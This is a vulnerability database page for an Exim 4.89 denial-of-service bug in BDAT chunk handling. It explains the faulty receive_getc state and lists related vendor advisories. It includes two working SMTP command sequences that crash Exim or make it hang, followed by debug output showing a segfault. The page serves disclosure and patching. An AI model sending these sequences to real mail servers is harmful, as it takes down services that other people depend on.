Vulners
Lucene search
Exim 4.89 - BDAT Denial of Service Exploit
| Reporter | Title | Published | Views | Family All 57 |
|---|---|---|---|---|
 | exim -- remote DoS attack in BDAT processing | 23 Nov 201700:00 | – | freebsd |
 | Critical: exim | 20 Dec 201700:00 | – | amazon |
 | Amazon Linux AMI : exim (ALAS-2017-932) | 26 Dec 201700:00 | – | nessus |
| Debian DSA-4053-1 : exim4 - security update | 1 Dec 201700:00 | – | nessus |
| Fedora 26 : exim (2017-0032baa7d7) | 13 Dec 201700:00 | – | nessus |
| Fedora 27 : exim (2017-0053bb9719) | 15 Jan 201800:00 | – | nessus |
| FreeBSD : exim -- remote DoS attack in BDAT processing (75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f) | 1 Dec 201700:00 | – | nessus |
| GLSA-201803-01 : Exim: Multiple vulnerabilities | 7 Mar 201800:00 | – | nessus |
| openSUSE Security Update : exim (openSUSE-2021-677) (Stack Clash) | 18 May 202100:00 | – | nessus |
| Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3499-1) | 30 Nov 201700:00 | – | nessus |
10
While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.
https://github.com/Exim/exim/blob/master/src/src/receive.c#L1867
Exim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack.
https://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547
Here is a simple PoC which leads to an infinite loop and program crash:
EHLO localhost
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
BDAT 10
.
BDAT 0
Part of debug info
============================
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30295 child 30502 ended: status=0x8b
15:36:54 30295 signal exit, signal 11 (core dumped)
15:36:54 30295 1 SMTP accept process now running
15:36:54 30295 Listening...
============================
We also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack.
This can be triggered using the following command:
EHLO localhost
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
BDAT 100
.
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
BDAT 0 LAST
// Tested on current master, ubuntu16.04.
# 0day.today [2018-03-20] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Nov 2017 00:00Current
8.8High risk
Vulners AI Score8.8
EPSS0.77909